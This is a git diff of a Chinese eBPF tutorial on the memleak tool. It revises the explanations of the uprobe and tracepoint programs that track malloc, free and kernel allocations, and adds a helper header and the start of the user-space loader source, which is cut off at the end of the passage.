-	if (sample_rate > 1) {
-		if (bpf_ktime_get_ns() % sample_rate != 0)
-			return 0;
-	}
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __type(key, pid_t);
+    __type(value, u64);
+    __uint(max_entries, 10240);
+} sizes SEC(".maps");
 
-	const pid_t pid = bpf_get_current_pid_tgid() >> 32;
-	bpf_map_update_elem(&sizes, &pid, &size, BPF_ANY);
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __type(key, u64); /* address */
+    __type(value, struct alloc_info);
+    __uint(max_entries, ALLOCS_MAX_ENTRIES);
+} allocs SEC(".maps");
 
-	if (trace_all)
-		bpf_printk("alloc entered, size = %lu\n", size);
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __type(key, u64); /* stack id */
+    __type(value, union combined_alloc_info);
+    __uint(max_entries, COMBINED_ALLOCS_MAX_ENTRIES);
+} combined_allocs SEC(".maps");
 
-	return 0;
-}
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __type(key, u64);
+    __type(value, u64);
+    __uint(max_entries, 10240);
+} memptrs SEC(".maps");
 
-SEC("uprobe")
+struct {
+    __uint(type, BPF_MAP_TYPE_STACK_TRACE);
+    __type(key, u32);
+} stack_traces SEC(".maps");
+
+static union combined_alloc_info initial_cinfo;
+
+

这段代码首先定义了一些可配置的参数,如 min_size, max_size, page_size, sample_rate, trace_all, stack_flagswa_missing_free,分别表示最小分配大小、最大分配大小、页面大小、采样率、是否追踪所有分配、堆栈标志和是否工作在缺失释放(missing free)模式。

+

接着定义了五个映射:

+
    +
  1. sizes:这是一个哈希类型的映射,键为进程 ID,值为 u64 类型,存储每个进程的分配大小。
  2. +
  3. allocs:这也是一个哈希类型的映射,键为分配的地址,值为 alloc_info 结构体,存储每个内存分配的详细信息。
  4. +
  5. combined_allocs:这是另一个哈希类型的映射,键为堆栈 ID,值为 combined_alloc_info 联合体,存储所有未释放分配的总大小和总次数。
  6. +
  7. memptrs:这也是一个哈希类型的映射,键和值都为 u64 类型,用于在用户空间和内核空间之间传递内存指针。
  8. +
  9. stack_traces:这是一个堆栈追踪类型的映射,键为 u32 类型,用于存储堆栈 ID。
  10. +
+

以用户态的内存分配追踪部分为例,主要是挂钩内存相关的函数调用,如 malloc, free, calloc, realloc, mmapmunmap,以便在调用这些函数时进行数据记录。在用户态,memleak 主要使用了 uprobes 技术进行挂载。

+

每个函数调用被分为 "enter" 和 "exit" 两部分。"enter" 部分记录的是函数调用的参数,如分配的大小或者释放的地址。"exit" 部分则主要用于获取函数的返回值,如分配得到的内存地址。

+

这里,gen_alloc_enter, gen_alloc_exit, gen_free_enter 是实现记录行为的函数,他们分别用于记录分配开始、分配结束和释放开始的相关信息。

+

函数原型示例如下:

+
SEC("uprobe")
 int BPF_KPROBE(malloc_enter, size_t size)
 {
-	return gen_alloc_enter(size);
-}
-
-

这个函数用于处理内存分配请求的进入事件。它会首先检查内存分配请求的大小是否在指定的范围内,如果不在范围内,则直接返回0表示不处理该事件。如果启用了采样率(sample_rate > 1),则该函数会采样内存分配请求的进入事件。如果当前时间戳不是采样周期的倍数,则也会直接返回0,表示不处理该事件。接下来,该函数会获取当前线程的PID并将其存储在pid变量中。然后,它会将当前线程的pid和请求的内存分配大小存储在sizes map中,以便后续收集和分析内存分配信息。如果开启了跟踪模式(trace_all),该函数会通过bpf_printk打印日志信息,以便用户实时监控内存分配的情况。

-

最后定义了BPF_KPROBE(malloc_enter, size_t size),它会在malloc函数被调用时被BPF uprobe拦截执行,并通过gen_alloc_enter来记录内存分配大小。

-
static void update_statistics_add(u64 stack_id, u64 sz)
-{
-	union combined_alloc_info *existing_cinfo;
-
-	existing_cinfo = bpf_map_lookup_or_try_init(&combined_allocs, &stack_id, &initial_cinfo);
-	if (!existing_cinfo)
-		return;
-
-	const union combined_alloc_info incremental_cinfo = {
-		.total_size = sz,
-		.number_of_allocs = 1
-	};
-
-	__sync_fetch_and_add(&existing_cinfo->bits, incremental_cinfo.bits);
-}
-static int gen_alloc_exit2(void *ctx, u64 address)
-{
-	const pid_t pid = bpf_get_current_pid_tgid() >> 32;
-	struct alloc_info info;
-
-	const u64* size = bpf_map_lookup_elem(&sizes, &pid);
-	if (!size)
-		return 0; // missed alloc entry
-
-	__builtin_memset(&info, 0, sizeof(info));
-
-	info.size = *size;
-	bpf_map_delete_elem(&sizes, &pid);
-
-	if (address != 0) {
-		info.timestamp_ns = bpf_ktime_get_ns();
-
-		info.stack_id = bpf_get_stackid(ctx, &stack_traces, stack_flags);
-
-		bpf_map_update_elem(&allocs, &address, &info, BPF_ANY);
-
-		update_statistics_add(info.stack_id, info.size);
-	}
-
-	if (trace_all) {
-		bpf_printk("alloc exited, size = %lu, result = %lx\n",
-				info.size, address);
-	}
-
-	return 0;
-}
-static int gen_alloc_exit(struct pt_regs *ctx)
-{
-	return gen_alloc_exit2(ctx, PT_REGS_RC(ctx));
+    // 记录分配开始的相关信息
+    return gen_alloc_enter(size);
 }
 
 SEC("uretprobe")
 int BPF_KRETPROBE(malloc_exit)
 {
-	return gen_alloc_exit(ctx);
-}
-
-

gen_alloc_exit2函数会在内存释放时被调用,它用来记录内存释放的信息,并更新相关的 map。具体地,它首先通过 bpf_get_current_pid_tgid 来获取当前进程的 PID,并将其右移32位,获得PID值,然后使用 bpf_map_lookup_elem 查找 sizes map 中与该 PID 相关联的内存分配大小信息,并将其赋值给 info.size。如果找不到相应的 entry,则返回 0,表示在内存分配时没有记录到该 PID 相关的信息。接着,它会调用 __builtin_memset 来将 info 的所有字段清零,并调用 bpf_map_delete_elem 来删除 sizes map 中与该 PID 相关联的 entry。

-

如果 address 不为 0,则说明存在相应的内存分配信息,此时它会调用 bpf_ktime_get_ns 来获取当前时间戳,并将其赋值给 info.timestamp_ns。然后,它会调用 bpf_get_stackid 来获取当前函数调用堆栈的 ID,并将其赋值给 info.stack_id。最后,它会调用 bpf_map_update_elem 来将 address 和 info 相关联,即将 address 映射到 info。随后,它会调用 update_statistics_add 函数来更新 combined_allocs map 中与 info.stack_id 相关联的内存分配信息。

-

最后,如果 trace_all 为真,则会调用 bpf_printk 打印相关的调试信息。

-

update_statistics_add函数的主要作用是更新内存分配的统计信息,其中参数stack_id是当前内存分配的堆栈ID,sz是当前内存分配的大小。该函数首先通过bpf_map_lookup_or_try_init函数在combined_allocs map中查找与当前堆栈ID相关联的combined_alloc_info结构体,如果找到了,则将新的分配大小和分配次数加入到已有的combined_alloc_info结构体中;如果未找到,则使用initial_cinfo初始化一个新的combined_alloc_info结构体,并添加到combined_allocs map中。

-

更新combined_alloc_info结构体的方法是使用__sync_fetch_and_add函数,原子地将incremental_cinfo中的值累加到existing_cinfo中的值中。通过这种方式,即使多个线程同时调用update_statistics_add函数,也可以保证计数的正确性。

-

在gen_alloc_exit函数中,将ctx参数传递给gen_alloc_exit2函数,并将它的返回值作为自己的返回值。这里使用了PT_REGS_RC宏获取函数返回值。

-

最后定义的BPF_KRETPROBE(malloc_exit)是一个kretprobe类型的函数,用于在malloc函数返回时执行。并调用gen_alloc_exit函数跟踪内存分配和释放的请求。

-
static void update_statistics_del(u64 stack_id, u64 sz)
-{
-	union combined_alloc_info *existing_cinfo;
-
-	existing_cinfo = bpf_map_lookup_elem(&combined_allocs, &stack_id);
-	if (!existing_cinfo) {
-		bpf_printk("failed to lookup combined allocs\n");
-
-		return;
-	}
-
-	const union combined_alloc_info decremental_cinfo = {
-		.total_size = sz,
-		.number_of_allocs = 1
-	};
-
-	__sync_fetch_and_sub(&existing_cinfo->bits, decremental_cinfo.bits);
-}
-
-static int gen_free_enter(const void *address)
-{
-	const u64 addr = (u64)address;
-
-	const struct alloc_info *info = bpf_map_lookup_elem(&allocs, &addr);
-	if (!info)
-		return 0;
-
-	bpf_map_delete_elem(&allocs, &addr);
-	update_statistics_del(info->stack_id, info->size);
-
-	if (trace_all) {
-		bpf_printk("free entered, address = %lx, size = %lu\n",
-				address, info->size);
-	}
-
-	return 0;
+    // 记录分配结束的相关信息
+    return gen_alloc_exit(ctx);
 }
 
 SEC("uprobe")
 int BPF_KPROBE(free_enter, void *address)
 {
-	return gen_free_enter(address);
+    // 记录释放开始的相关信息
+    return gen_free_enter(address);
 }
 
-

gen_free_enter函数接收一个地址参数,该函数首先使用allocs map查找该地址对应的内存分配信息。如果未找到,则表示该地址没有被分配,该函数返回0。如果找到了对应的内存分配信息,则使用bpf_map_delete_elem从allocs map中删除该信息。

-

接下来,调用update_statistics_del函数用于更新内存分配的统计信息,它接收堆栈ID和内存块大小作为参数。首先在combined_allocs map中查找堆栈ID对应的内存分配统计信息。如果没有找到,则输出一条日志,表示查找失败,并且函数直接返回。如果找到了对应的内存分配统计信息,则使用原子操作从内存分配统计信息中减去该内存块大小和1(表示减少了1个内存块)。这是因为堆栈ID对应的内存块数量减少了1,而堆栈ID对应的内存块总大小也减少了该内存块的大小。

-

最后定义了一个bpf程序BPF_KPROBE(free_enter, void *address)会在进程调用free函数时执行。它会接收参数address,表示正在释放的内存块的地址,并调用gen_free_enter函数来处理该内存块的释放。

+

其中,malloc_enterfree_enter 是分别挂载在 mallocfree 函数入口处的探针(probes),用于在函数调用时进行数据记录。而 malloc_exit 则是挂载在 malloc 函数的返回处的探针,用于记录函数的返回值。

+

这些函数使用了 BPF_KPROBEBPF_KRETPROBE 这两个宏来声明,这两个宏分别用于声明 kprobe(内核探针)和 kretprobe(内核返回探针)。具体来说,kprobe 用于在函数调用时触发,而 kretprobe 则是在函数返回时触发。

+

gen_alloc_enter 函数是在内存分配请求的开始时被调用的。这个函数主要负责在调用分配内存的函数时收集一些基本的信息。下面我们将深入探讨这个函数的实现。

+
static int gen_alloc_enter(size_t size)
+{
+    if (size < min_size || size > max_size)
+        return 0;
+
+    if (sample_rate > 1) {
+        if (bpf_ktime_get_ns() % sample_rate != 0)
+            return 0;
+    }
+
+    const pid_t pid = bpf_get_current_pid_tgid() >> 32;
+    bpf_map_update_elem(&sizes, &pid, &size, BPF_ANY);
+
+    if (trace_all)
+        bpf_printk("alloc entered, size = %lu\n", size);
+
+    return 0;
+}
+
+SEC("uprobe")
+int BPF_KPROBE(malloc_enter, size_t size)
+{
+    return gen_alloc_enter(size);
+}
+
+

首先,gen_alloc_enter 函数接收一个 size 参数,这个参数表示请求分配的内存的大小。如果这个值不在 min_sizemax_size 之间,函数将直接返回,不再进行后续的操作。这样可以使工具专注于追踪特定范围的内存分配请求,过滤掉不感兴趣的分配请求。

+

接下来,函数检查采样率 sample_rate。如果 sample_rate 大于1,意味着我们不需要追踪所有的内存分配请求,而是周期性地追踪。这里使用 bpf_ktime_get_ns 获取当前的时间戳,然后通过取模运算来决定是否需要追踪当前的内存分配请求。这是一种常见的采样技术,用于降低性能开销,同时还能够提供一个代表性的样本用于分析。

+

之后,函数使用 bpf_get_current_pid_tgid 函数获取当前进程的 PID。注意这里的 PID 实际上是进程和线程的组合 ID,我们通过右移 32 位来获取真正的进程 ID。

+

函数接下来更新 sizes 这个 map,这个 map 以进程 ID 为键,以请求的内存分配大小为值。BPF_ANY 表示如果 key 已存在,那么更新 value,否则就新建一个条目。

+

最后,如果启用了 trace_all 标志,函数将打印一条信息,说明发生了内存分配。

+

BPF_KPROBE 宏用于

+

最后定义了 BPF_KPROBE(malloc_enter, size_t size),它会在 malloc 函数被调用时被 BPF uprobe 拦截执行,并通过 gen_alloc_enter 来记录内存分配大小。 +我们刚刚分析了内存分配的入口函数 gen_alloc_enter,现在我们来关注这个过程的退出部分。具体来说,我们将讨论 gen_alloc_exit2 函数以及如何从内存分配调用中获取返回的内存地址。

+
static int gen_alloc_exit2(void *ctx, u64 address)
+{
+    const pid_t pid = bpf_get_current_pid_tgid() >> 32;
+    struct alloc_info info;
+
+    const u64* size = bpf_map_lookup_elem(&sizes, &pid);
+    if (!size)
+        return 0; // missed alloc entry
+
+    __builtin_memset(&info, 0, sizeof(info));
+
+    info.size = *size;
+    bpf_map_delete_elem(&sizes, &pid);
+
+    if (address != 0) {
+        info.timestamp_ns = bpf_ktime_get_ns();
+
+        info.stack_id = bpf_get_stackid(ctx, &stack_traces, stack_flags);
+
+        bpf_map_update_elem(&allocs, &address, &info, BPF_ANY);
+
+        update_statistics_add(info.stack_id, info.size);
+    }
+
+    if (trace_all) {
+        bpf_printk("alloc exited, size = %lu, result = %lx\n",
+                info.size, address);
+    }
+
+    return 0;
+}
+static int gen_alloc_exit(struct pt_regs *ctx)
+{
+    return gen_alloc_exit2(ctx, PT_REGS_RC(ctx));
+}
+
+SEC("uretprobe")
+int BPF_KRETPROBE(malloc_exit)
+{
+    return gen_alloc_exit(ctx);
+}
+
+

gen_alloc_exit2 函数在内存分配操作完成时被调用,这个函数接收两个参数,一个是上下文 ctx,另一个是内存分配函数返回的内存地址 address

+

首先,它获取当前线程的 PID,然后使用这个 PID 作为键在 sizes 这个 map 中查找对应的内存分配大小。如果没有找到(也就是说,没有对应的内存分配操作的入口),函数就会直接返回。

+

接着,函数清除 info 结构体的内容,并设置它的 size 字段为之前在 map 中找到的内存分配大小。并从 sizes 这个 map 中删除相应的元素,因为此时内存分配操作已经完成,不再需要这个信息。

+

接下来,如果 address 不为 0(也就是说,内存分配操作成功了),函数就会进一步收集一些额外的信息。首先,它获取当前的时间戳作为内存分配完成的时间,并获取当前的堆栈跟踪。这些信息都会被储存在 info 结构体中,并随后更新到 allocs 这个 map 中。

+

最后,函数调用 update_statistics_add 更新统计数据,如果启用了所有内存分配操作的跟踪,函数还会打印一些关于内存分配操作的信息。

+

请注意,gen_alloc_exit 函数是 gen_alloc_exit2 的一个包装,它将 PT_REGS_RC(ctx) 作为 address 参数传递给 gen_alloc_exit2在我们的讨论中,我们刚刚提到在gen_alloc_exit2函数中,调用了update_statistics_add` 函数以更新内存分配的统计数据。下面我们详细看一下这个函数的具体实现。

+
static void update_statistics_add(u64 stack_id, u64 sz)
+{
+    union combined_alloc_info *existing_cinfo;
+
+    existing_cinfo = bpf_map_lookup_or_try_init(&combined_allocs, &stack_id, &initial_cinfo);
+    if (!existing_cinfo)
+        return;
+
+    const union combined_alloc_info incremental_cinfo = {
+        .total_size = sz,
+        .number_of_allocs = 1
+    };
+
+    __sync_fetch_and_add(&existing_cinfo->bits, incremental_cinfo.bits);
+}
+
+

update_statistics_add 函数接收两个参数:当前的堆栈 ID stack_id 以及内存分配的大小 sz。这两个参数都在内存分配事件中收集到,并且用于更新内存分配的统计数据。

+

首先,函数尝试在 combined_allocs 这个 map 中查找键值为当前堆栈 ID 的元素,如果找不到,就用 initial_cinfo(这是一个默认的 combined_alloc_info 结构体,所有字段都为零)来初始化新的元素。

+

接着,函数创建一个 incremental_cinfo,并设置它的 total_size 为当前内存分配的大小,设置 number_of_allocs 为 1。这是因为每次调用 update_statistics_add 函数都表示有一个新的内存分配事件发生,而这个事件的内存分配大小就是 sz

+

最后,函数使用 __sync_fetch_and_add 函数原子地将 incremental_cinfo 的值加到 existing_cinfo 中。请注意这个步骤是线程安全的,即使有多个线程并发地调用 update_statistics_add 函数,每个内存分配事件也能正确地记录到统计数据中。

+

总的来说,update_statistics_add 函数实现了内存分配统计的更新逻辑,通过维护每个堆栈 ID 的内存分配总量和次数,我们可以深入了解到程序的内存分配行为。 +在我们对内存分配的统计跟踪过程中,我们不仅要统计内存的分配,还要考虑内存的释放。在上述代码中,我们定义了一个名为 update_statistics_del 的函数,其作用是在内存释放时更新统计信息。而 gen_free_enter 函数则是在进程调用 free 函数时被执行。

+
static void update_statistics_del(u64 stack_id, u64 sz)
+{
+    union combined_alloc_info *existing_cinfo;
+
+    existing_cinfo = bpf_map_lookup_elem(&combined_allocs, &stack_id);
+    if (!existing_cinfo) {
+        bpf_printk("failed to lookup combined allocs\n");
+        return;
+    }
+
+    const union combined_alloc_info decremental_cinfo = {
+        .total_size = sz,
+        .number_of_allocs = 1
+    };
+
+    __sync_fetch_and_sub(&existing_cinfo->bits, decremental_cinfo.bits);
+}
+
+

update_statistics_del 函数的参数为堆栈 ID 和要释放的内存块大小。函数首先在 combined_allocs 这个 map 中使用当前的堆栈 ID 作为键来查找相应的 combined_alloc_info 结构体。如果找不到,就输出错误信息,然后函数返回。如果找到了,就会构造一个名为 decremental_cinfocombined_alloc_info 结构体,设置它的 total_size 为要释放的内存大小,设置 number_of_allocs 为 1。然后使用 __sync_fetch_and_sub 函数原子地从 existing_cinfo 中减去 decremental_cinfo 的值。请注意,这里的 number_of_allocs 是负数,表示减少了一个内存分配。

+
static int gen_free_enter(const void *address)
+{
+    const u64 addr = (u64)address;
+
+    const struct alloc_info *info = bpf_map_lookup_elem(&allocs, &addr);
+    if (!info)
+        return 0;
+
+    bpf_map_delete_elem(&allocs, &addr);
+    update_statistics_del(info->stack_id, info->size);
+
+    if (trace_all) {
+        bpf_printk("free entered, address = %lx, size = %lu\n",
+                address, info->size);
+    }
+
+    return 0;
+}
+
+SEC("uprobe")
+int BPF_KPROBE(free_enter, void *address)
+{
+    return gen_free_enter(address);
+}
+
+

接下来看 gen_free_enter 函数。它接收一个地址作为参数,这个地址是内存分配的结果,也就是将要释放的内存的起始地址。函数首先在 allocs 这个 map 中使用这个地址作为键来查找对应的 alloc_info 结构体。如果找不到,那么就直接返回,因为这意味着这个地址并没有被分配过。如果找到了,那么就删除这个元素,并且调用 update_statistics_del 函数来更新统计数据。最后,如果启用了全局追踪,那么还会输出一条信息,包括这个地址以及它的大小。 +在我们追踪和统计内存分配的同时,我们也需要对内核态的内存分配和释放进行追踪。在Linux内核中,kmem_cache_alloc函数和kfree函数分别用于内核态的内存分配和释放。

+
SEC("tracepoint/kmem/kfree")
+int memleak__kfree(void *ctx)
+{
+    const void *ptr;
+
+    if (has_kfree()) {
+        struct trace_event_raw_kfree___x *args = ctx;
+        ptr = BPF_CORE_READ(args, ptr);
+    } else {
+        struct trace_event_raw_kmem_free___x *args = ctx;
+        ptr = BPF_CORE_READ(args, ptr);
+    }
+
+    return gen_free_enter(ptr);
+}
+
+

上述代码片段定义了一个函数memleak__kfree,这是一个bpf程序,会在内核调用kfree函数时执行。首先,该函数检查是否存在kfree函数。如果存在,则会读取传递给kfree函数的参数(即要释放的内存块的地址),并保存到变量ptr中;否则,会读取传递给kmem_free函数的参数(即要释放的内存块的地址),并保存到变量ptr中。接着,该函数会调用之前定义的gen_free_enter函数来处理该内存块的释放。

+
SEC("tracepoint/kmem/kmem_cache_alloc")
+int memleak__kmem_cache_alloc(struct trace_event_raw_kmem_alloc *ctx)
+{
+    if (wa_missing_free)
+        gen_free_enter(ctx->ptr);
+
+    gen_alloc_enter(ctx->bytes_alloc);
+
+    return gen_alloc_exit2(ctx, (u64)(ctx->ptr));
+}
+
+

这段代码定义了一个函数 memleak__kmem_cache_alloc,这也是一个bpf程序,会在内核调用 kmem_cache_alloc 函数时执行。如果标记 wa_missing_free 被设置,则调用 gen_free_enter 函数处理可能遗漏的释放操作。然后,该函数会调用 gen_alloc_enter 函数来处理内存分配,最后调用gen_alloc_exit2函数记录分配的结果。

+

这两个 bpf 程序都使用了 SEC 宏定义了对应的 tracepoint,以便在相应的内核函数被调用时得到执行。在Linux内核中,tracepoint 是一种可以在内核中插入的静态钩子,可以用来收集运行时的内核信息,它在调试和性能分析中非常有用。

+

在理解这些代码的过程中,要注意 BPF_CORE_READ 宏的使用。这个宏用于在 bpf 程序中读取内核数据。在 bpf 程序中,我们不能直接访问内核内存,而需要使用这样的宏来安全地读取数据。

+

用户态程序

+

在理解 BPF 内核部分之后,我们转到用户空间程序。用户空间程序与BPF内核程序紧密配合,它负责将BPF程序加载到内核,设置和管理BPF map,以及处理从BPF程序收集到的数据。用户态程序较长,我们这里可以简要参考一下它的挂载点。

+
int attach_uprobes(struct memleak_bpf *skel)
+{
+    ATTACH_UPROBE_CHECKED(skel, malloc, malloc_enter);
+    ATTACH_URETPROBE_CHECKED(skel, malloc, malloc_exit);
+
+    ATTACH_UPROBE_CHECKED(skel, calloc, calloc_enter);
+    ATTACH_URETPROBE_CHECKED(skel, calloc, calloc_exit);
+
+    ATTACH_UPROBE_CHECKED(skel, realloc, realloc_enter);
+    ATTACH_URETPROBE_CHECKED(skel, realloc, realloc_exit);
+
+    ATTACH_UPROBE_CHECKED(skel, mmap, mmap_enter);
+    ATTACH_URETPROBE_CHECKED(skel, mmap, mmap_exit);
+
+    ATTACH_UPROBE_CHECKED(skel, posix_memalign, posix_memalign_enter);
+    ATTACH_URETPROBE_CHECKED(skel, posix_memalign, posix_memalign_exit);
+
+    ATTACH_UPROBE_CHECKED(skel, memalign, memalign_enter);
+    ATTACH_URETPROBE_CHECKED(skel, memalign, memalign_exit);
+
+    ATTACH_UPROBE_CHECKED(skel, free, free_enter);
+    ATTACH_UPROBE_CHECKED(skel, munmap, munmap_enter);
+
+    // the following probes are intentinally allowed to fail attachment
+
+    // deprecated in libc.so bionic
+    ATTACH_UPROBE(skel, valloc, valloc_enter);
+    ATTACH_URETPROBE(skel, valloc, valloc_exit);
+
+    // deprecated in libc.so bionic
+    ATTACH_UPROBE(skel, pvalloc, pvalloc_enter);
+    ATTACH_URETPROBE(skel, pvalloc, pvalloc_exit);
+
+    // added in C11
+    ATTACH_UPROBE(skel, aligned_alloc, aligned_alloc_enter);
+    ATTACH_URETPROBE(skel, aligned_alloc, aligned_alloc_exit);
+
+    return 0;
+}
+
+

在这段代码中,我们看到一个名为attach_uprobes的函数,该函数负责将uprobes(用户空间探测点)挂载到内存分配和释放函数上。在Linux中,uprobes是一种内核机制,可以在用户空间程序中的任意位置设置断点,这使得我们可以非常精确地观察和控制用户空间程序的行为。

+

这里,每个内存相关的函数都通过两个uprobes进行跟踪:一个在函数入口(enter),一个在函数退出(exit)。因此,每当这些函数被调用或返回时,都会触发一个uprobes事件,进而触发相应的BPF程序。

+

在具体的实现中,我们使用了ATTACH_UPROBEATTACH_URETPROBE两个宏来附加uprobes和uretprobes(函数返回探测点)。每个宏都需要三个参数:BPF程序的骨架(skel),要监视的函数名,以及要触发的BPF程序的名称。

+

这些挂载点包括常见的内存分配函数,如malloc、calloc、realloc、mmap、posix_memalign、memalign、free等,以及对应的退出点。另外,我们也观察一些可能的分配函数,如valloc、pvalloc、aligned_alloc等,尽管它们可能不总是存在。

+

这些挂载点的目标是捕获所有可能的内存分配和释放事件,从而使我们的内存泄露检测工具能够获取到尽可能全面的数据。这种方法可以让我们不仅能跟踪到内存分配和释放,还能得到它们发生的上下文信息,例如调用栈和调用次数,从而帮助我们定位和修复内存泄露问题。

+

注意,一些内存分配函数可能并不存在或已弃用,比如valloc、pvalloc等,因此它们的附加可能会失败。在这种情况下,我们允许附加失败,并不会阻止程序的执行。这是因为我们更关注的是主流和常用的内存分配函数,而这些已经被弃用的函数往往在实际应用中较少使用。

+

完整的源代码:https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/16-memleak

编译运行

$ git clone https://github.com/iovisor/bcc.git --recurse-submodules 
 $ cd libbpf-tools/
@@ -371,8 +533,9 @@ Tracing outstanding memory allocs...  Hit Ctrl-C to end
 ...
 

总结

-

memleak是一个内存泄漏监控工具,可以用来跟踪内存分配和释放时间对应的调用栈信息。随着时间的推移,这个工具可以显示长期不被释放的内存。

-

这份代码来自于https://github.com/iovisor/bcc/blob/master/libbpf-tools/memleak.bpf.c

+

通过本篇 eBPF 入门实践教程,您已经学习了如何编写 Memleak eBPF 监控程序,以实时监控程序的内存泄漏。您已经了解了 eBPF 在内存监控方面的应用,学会了使用 BPF API 编写 eBPF 程序,创建和使用 eBPF maps,并且明白了如何用 eBPF 工具监测和分析内存泄漏问题。我们展示了一个详细的例子,帮助您理解 eBPF 代码的运行流程和原理。

+

您可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

+

接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容。希望这些知识和技巧能帮助您更好地了解和使用 eBPF,以解决实际工作中遇到的问题。

diff --git a/16-memleak/maps.bpf.h b/16-memleak/maps.bpf.h new file mode 100644 index 0000000..51d1012 --- /dev/null +++ b/16-memleak/maps.bpf.h @@ -0,0 +1,26 @@ +// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +// Copyright (c) 2020 Anton Protopopov +#ifndef __MAPS_BPF_H +#define __MAPS_BPF_H + +#include +#include + +static __always_inline void * +bpf_map_lookup_or_try_init(void *map, const void *key, const void *init) +{ + void *val; + long err; + + val = bpf_map_lookup_elem(map, key); + if (val) + return val; + + err = bpf_map_update_elem(map, key, init, BPF_NOEXIST); + if (err && err != -EEXIST) + return 0; + + return bpf_map_lookup_elem(map, key); +} + +#endif /* __MAPS_BPF_H */ diff --git a/16-memleak/memleak.bpf.c b/16-memleak/memleak.bpf.c index ac35a55..aa213c8 100644 --- a/16-memleak/memleak.bpf.c +++ b/16-memleak/memleak.bpf.c @@ -337,7 +337,7 @@ int memleak__kfree(void *ctx) ptr = BPF_CORE_READ(args, ptr); } - return gen_free_enter((void *)ptr); + return gen_free_enter(ptr); } SEC("tracepoint/kmem/kmem_cache_alloc") @@ -375,7 +375,7 @@ int memleak__kmem_cache_free(void *ctx) ptr = BPF_CORE_READ(args, ptr); } - return gen_free_enter((void *)ptr); + return gen_free_enter(ptr); } SEC("tracepoint/kmem/mm_page_alloc") diff --git a/16-memleak/memleak.c b/16-memleak/memleak.c new file mode 100644 index 0000000..b106ebc --- /dev/null +++ b/16-memleak/memleak.c @@ -0,0 +1,1067 @@ +// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +// Copyright (c) 2023 Meta Platforms, Inc. and affiliates. +// +// Based on memleak(8) from BCC by Sasha Goldshtein and others. +// 1-Mar-2023 JP Kobryn Created this. +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include + +#include "memleak.h" +#include "memleak.skel.h" +#include "trace_helpers.h" + +#ifdef USE_BLAZESYM +#include "blazesym.h" +#endif + +static struct env { + int interval; + int nr_intervals; + pid_t pid; + bool trace_all; + bool show_allocs; + bool combined_only; + int min_age_ns; + uint64_t sample_rate; + int top_stacks; + size_t min_size; + size_t max_size; + char object[32]; + + bool wa_missing_free; + bool percpu; + int perf_max_stack_depth; + int stack_map_max_entries; + long page_size; + bool kernel_trace; + bool verbose; + char command[32]; +} env = { + .interval = 5, // posarg 1 + .nr_intervals = -1, // posarg 2 + .pid = -1, // -p --pid + .trace_all = false, // -t --trace + .show_allocs = false, // -a --show-allocs + .combined_only = false, // --combined-only + .min_age_ns = 500, // -o --older (arg * 1e6) + .wa_missing_free = false, // --wa-missing-free + .sample_rate = 1, // -s --sample-rate + .top_stacks = 10, // -T --top + .min_size = 0, // -z --min-size + .max_size = -1, // -Z --max-size + .object = {0}, // -O --obj + .percpu = false, // --percpu + .perf_max_stack_depth = 127, + .stack_map_max_entries = 10240, + .page_size = 1, + .kernel_trace = true, + .verbose = false, + .command = {0}, // -c --command +}; + +struct allocation_node { + uint64_t address; + size_t size; + struct allocation_node* next; +}; + +struct allocation { + uint64_t stack_id; + size_t size; + size_t count; + struct allocation_node* allocations; +}; + +#define __ATTACH_UPROBE(skel, sym_name, prog_name, is_retprobe) \ + do { \ + LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts, \ + .func_name = #sym_name, \ + .retprobe = is_retprobe); \ + skel->links.prog_name = bpf_program__attach_uprobe_opts( \ + skel->progs.prog_name, \ + env.pid, \ + env.object, \ + 0, \ + &uprobe_opts); \ + } while (false) + +#define __CHECK_PROGRAM(skel, prog_name) \ + do { \ + if (!skel->links.prog_name) { \ + perror("no program attached for " #prog_name); \ + return -errno; \ + } \ + } while (false) + +#define __ATTACH_UPROBE_CHECKED(skel, sym_name, prog_name, is_retprobe) \ + do { \ + __ATTACH_UPROBE(skel, sym_name, prog_name, is_retprobe); \ + __CHECK_PROGRAM(skel, prog_name); \ + } while (false) + +#define ATTACH_UPROBE(skel, sym_name, prog_name) __ATTACH_UPROBE(skel, sym_name, prog_name, false) +#define ATTACH_URETPROBE(skel, sym_name, prog_name) __ATTACH_UPROBE(skel, sym_name, prog_name, true) + +#define ATTACH_UPROBE_CHECKED(skel, sym_name, prog_name) __ATTACH_UPROBE_CHECKED(skel, sym_name, prog_name, false) +#define ATTACH_URETPROBE_CHECKED(skel, sym_name, prog_name) __ATTACH_UPROBE_CHECKED(skel, sym_name, prog_name, true) + +static void sig_handler(int signo); + +static long argp_parse_long(int key, const char *arg, struct argp_state *state); +static error_t argp_parse_arg(int key, char *arg, struct argp_state *state); + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args); + +static int event_init(int *fd); +static int event_wait(int fd, uint64_t expected_event); +static int event_notify(int fd, uint64_t event); + +static pid_t fork_sync_exec(const char *command, int fd); + +#ifdef USE_BLAZESYM +static void print_stack_frame_by_blazesym(size_t frame, uint64_t addr, const blazesym_csym *sym); +static void print_stack_frames_by_blazesym(); +#else +static void print_stack_frames_by_ksyms(); +static void print_stack_frames_by_syms_cache(); +#endif +static int print_stack_frames(struct allocation *allocs, size_t nr_allocs, int stack_traces_fd); + +static int alloc_size_compare(const void *a, const void *b); + +static int print_outstanding_allocs(int allocs_fd, int stack_traces_fd); +static int print_outstanding_combined_allocs(int combined_allocs_fd, int stack_traces_fd); + +static bool has_kernel_node_tracepoints(); +static void disable_kernel_node_tracepoints(struct memleak_bpf *skel); +static void disable_kernel_percpu_tracepoints(struct memleak_bpf *skel); +static void disable_kernel_tracepoints(struct memleak_bpf *skel); + +static int attach_uprobes(struct memleak_bpf *skel); + +const char *argp_program_version = "memleak 0.1"; +const char *argp_program_bug_address = + "https://github.com/iovisor/bcc/tree/master/libbpf-tools"; + +const char 